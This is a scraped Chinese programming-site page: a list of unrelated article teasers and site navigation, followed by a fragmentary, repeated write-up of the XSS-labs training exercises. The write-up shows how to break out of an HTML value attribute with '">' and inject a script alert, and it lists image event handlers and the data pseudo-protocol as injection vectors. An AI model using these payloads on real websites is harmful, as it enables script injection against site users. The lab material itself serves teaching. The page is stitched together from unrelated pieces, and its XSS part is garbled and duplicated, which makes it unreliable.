 KEEP IT SIMPLE, STUPID! 编写只做一件事情，并且要做好的程序；编写可以在一起工作的程序，编写处理文本流的程序，因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律，高明的工程师的神圣的“KISS 原</div>
                                </li>
                                <li><a href="/article/2712.htm"
                                       title="android Activity间List传值" target="_blank">android Activity间List传值</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/Activity/1.htm">Activity</a>
                                    <div>第一个Activity： 
import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a</div>
                                </li>
                                <li><a href="/article/2839.htm"
                                       title="tomcat 设置java虚拟机内存" target="_blank">tomcat 设置java虚拟机内存</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/tomcat+%E5%86%85%E5%AD%98%E8%AE%BE%E7%BD%AE/1.htm">tomcat 内存设置</a>
                                    <div>转载请出自出处：http://eksliang.iteye.com/blog/2117772 
http://eksliang.iteye.com/ 
常见的内存溢出有以下两种: 
java.lang.OutOfMemoryError: PermGen space  
java.lang.OutOfMemoryError: Java heap space 
&nbsp; 
------------</div>
                                </li>
                                <li><a href="/article/2966.htm"
                                       title="Android 数据库事务处理" target="_blank">Android 数据库事务处理</a>
                                    <span class="text-muted">gqdy365</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>使用SQLiteDatabase的beginTransaction()方法可以开启一个事务，程序执行到endTransaction() 方法时会检查事务的标志是否为成功，如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务，如果没有调用setTransactionSuccessful() 方法则回滚事务。事</div>
                                </li>
                                <li><a href="/article/3093.htm"
                                       title="Java 打开浏览器" target="_blank">Java 打开浏览器</a>
                                    <span class="text-muted">hw1287789687</span>
<a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E7%BD%91%E5%9D%80/1.htm">打开网址</a><a class="tag" taget="_blank" href="/search/open%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">open浏览器</a><a class="tag" taget="_blank" href="/search/open+browser/1.htm">open browser</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80url/1.htm">打开url</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">打开浏览器</a>
                                    <div>使用java 语言如何打开浏览器呢? 
我们先研究下在cmd窗口中,如何打开网址 
使用IE 打开 
D:\software\bin&gt;cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 
使用火狐打开 
D:\software\bin&gt;cmd /c start firefox http://hw1287789</div>
                                </li>
                                <li><a href="/article/3220.htm"
                                       title="ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件" target="_blank">ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件</a>
                                    <span class="text-muted">justjavac</span>
<a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/Google/1.htm">Google</a><a class="tag" taget="_blank" href="/search/google+api/1.htm">google api</a><a class="tag" taget="_blank" href="/search/chrome%E6%8F%92%E4%BB%B6/1.htm">chrome插件</a>
                                    <div>Chrome Web Store 安装地址：&nbsp;https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 
 
 由于众所周知的原因，只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样，通过script标记引用这些资源，让网站访问速度瞬间提速吧</div>
                                </li>
                                <li><a href="/article/3347.htm"
                                       title="进程VS.线程" target="_blank">进程VS.线程</a>
                                    <span class="text-muted">m635674608</span>
<a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B/1.htm">线程</a>
                                    <div>资料来源： 
http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点： 
多进程模式最大</div>
                                </li>
                                <li><a href="/article/3474.htm"
                                       title="Linux下安装MemCached" target="_blank">Linux下安装MemCached</a>
                                    <span class="text-muted">字符串</span>
<a class="tag" taget="_blank" href="/search/memcached/1.htm">memcached</a>
                                    <div>前提准备：1. MemCached目前最新版本为：1.4.22，可以从官网下载到。2. MemCached依赖libevent，因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令，查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n</div>
                                </li>
                                <li><a href="/article/3601.htm"
                                       title="java设计模式之--jdk动态代理（实现aop编程）" target="_blank">java设计模式之--jdk动态代理（实现aop编程）</a>
                                    <span class="text-muted">Supanccy2013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a>
                                    <div>&nbsp;&nbsp;&nbsp; 与静态代理类对照的是动态代理类，动态代理类的字节码在程序运行时由Java反射机制动态生成，无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作，而且提高了软件系统的可扩展性，因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 
&</div>
                                </li>
                                <li><a href="/article/3728.htm"
                                       title="Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持" target="_blank">Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持</a>
                                    <span class="text-muted">wiselyman</span>
<a class="tag" taget="_blank" href="/search/spring+4/1.htm">spring 4</a>
                                    <div>2.1 默认方法(default method) 
 
 java8引入了一个default medthod; 
 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 
 使用default关键字 
 Spring 4.2支持加载在默认方法里声明的bean 
  
2.2 
 
 将要被声明成bean的类 
  
public class DemoService {
    </div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>

XSS-labs

漏洞原理

Level1 【无过滤】

欢迎用户test1

欢迎用户test1

Level2 【参数】

"> 就会实现xss注入
所以payload 就是

`">`

标签

src

onmouseout 鼠标移出图片

onmouseover 鼠标移动到图片

data 伪协议

XSS-labs

漏洞原理

Level1 【无过滤】

欢迎用户test1

欢迎用户test1alert(1)

Level2 【参数】

标签</h3> <pre><code>value="1"> 如果我们自己将其闭合呢 我们输入 "> 就会变为 value="">"> 这里 其实就是 value=""> "> 然后我们构造恶意代码 value=""><script>alert(1) "> 就会实现xss注入 所以payload 就是 ">alert(1)

标签

src

onmouseout 鼠标移出图片

onmouseover 鼠标移动到图片

data 伪协议

欢迎用户test1

"> 就会实现xss注入
所以payload 就是

`">`